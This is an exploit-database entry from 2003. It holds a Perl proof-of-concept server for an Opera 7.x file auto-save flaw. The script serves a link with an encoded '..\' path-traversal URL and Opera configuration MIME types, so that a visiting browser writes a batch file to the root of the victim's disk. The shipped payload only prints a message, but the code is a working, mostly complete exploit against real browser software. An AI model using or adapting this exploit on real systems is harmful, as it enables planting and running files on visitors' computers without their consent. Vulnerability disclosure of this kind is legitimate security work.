Opera 7.22 - File Creation and Execution (WebServer)

EDB-ID:

127

CVE:



Author:

nesumin

Type:

remote


Platform:

Windows

Date:

2003-11-22


#!/usr/bin/perl
##################################################
#
# Sample code of
#   "[Opera 7] Arbitrary File Auto-Saved Vulnerability."
#   
#   This Exploit will run a webserver that will create and execute a batch 
#   file on the victim's computer when visiting this malicious server
#
#   This perl script is a small HTTP server for a check ofthe vulnerability.
#   BTW, you can exploit this vulnerability without a server like this 
#   if your apache or etc., allow a request URL that contains '..'.
#
# Tested on :
#   Opera 7.22
#   Opera 7.21
#   Opera 7.20
#   Opera 7.1X
#   Opera 7.0X
#
#   with Active Perl 5.8.0 on Windows 2000 Pro SP4 JP.
#   (maybe need Perl 5.6 or later)
#
# Usage :
#  [0] Execute "perl this_script 10080" on a console,
#      this server starts to listen in port 10080.
#  [1] Opera opens "http://127.0.0.1:10080/".
#  [2] Click link.
#  [3] Auto-saved an arbitrary file on a root directory
#      of Local Disk ...
#
# 2003/11/15
# written by nesumin <nesumin softhome net>
# public on www.k-otik.com
#
###################################################
use HTTP::Daemon;
use HTTP::Status;

use constant URL => '..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C_opera_.bat';

use constant FILE_CONTENT => qq~\@echo off\x0D\x0Aecho "Love & Peace :-)"\x0D\x0A\@pause~;
use constant RES_HEADERS => qw(Pragma no-cache Connection close);
use constant REUSE => 1;
use constant VIEW_DATA => 0;


my @MIMETYPES = qw(
application/x-opera-configuration-keyboard
application/x-opera-configuration-menu
application/x-opera-configuration-mouse
application/x-opera-configuration-toolbar
application/x-opera-configuration-skin
application/x-opera-skin
);
my $port = ($ARGV[0] || 10080) + 0;
die("port is not correct") unless (0 < $port && $port < 65536);

my $daemon = new HTTP::Daemon(LocalPort=>$port, Reuse=>REUSE)
or die("HTTP::Daemon->new() error : $!.\n");
select(STDERR);
printf("[*] server started on %d.\n", $daemon->sockport());

while (my $ccon = $daemon->accept()) {
printf("[*] incoming client : from %s:%d(%08X).\n",
 inet_ntoa($ccon->peeraddr()), $ccon->peerport(), $ccon);
if (my $req = $ccon->get_request()) {
 print("\n[*] request received...\n", map{" >>  $_\n"}
  ($req->as_string() =~ /^([^\r\n]+)/mg)) if (VIEW_DATA);
 if ($req->method eq 'GET') {
  my $url = URL;
  my $res = new HTTP::Response(200, 'OK', new HTTP::Headers(RES_HEADERS));
  $res->protocol("HTTP/1.0");
  if ($req->url->path eq '/') {
   $res->header('Content-type'=>'text/html');
   $res->content(qq~<a href="$url">Click here</a>~);
  
  } else {

   my $mimetype = $MIMETYPES[rand(@MIMETYPES)];
   if ($req->header('User-Agent')=~m~Opera[\s+/]((\d\.\d)\d)~i){
    # Opera 7.0x
    if ($2 eq "7.0") {
     $url .= '*.zip';# '*' is a special char :-)
     $mimetype = $MIMETYPES[$#MIMETYPES];
    # Opera 7.22
    } elsif ($1 eq "7.22") {
     $mimetype = $MIMETYPES[rand(@MIMETYPES-2)];
    }
   }

   $res->header('Content-type'=>$mimetype);
   $res->content(FILE_CONTENT);
  }
  $ccon->send_response($res);
  print("\n[*] response sent...\n", map{" >>  $_\n"}
   ($res->as_string() =~ /^([^\r\n]+)/mg)) if (VIEW_DATA);
 } else {
  $ccon->send_error(RC_METHOD_NOT_ALLOWED);
 }
}
printf("[*] client closed : from %s:%d (%08X).\n",
 inet_ntoa($ccon->peeraddr()), $ccon->peerport(), $ccon);
$ccon->close();
undef($ccon);
}
print("[*] server closed.\n");
$daemon->close();
undef($daemon);

# milw0rm.com [2003-11-22]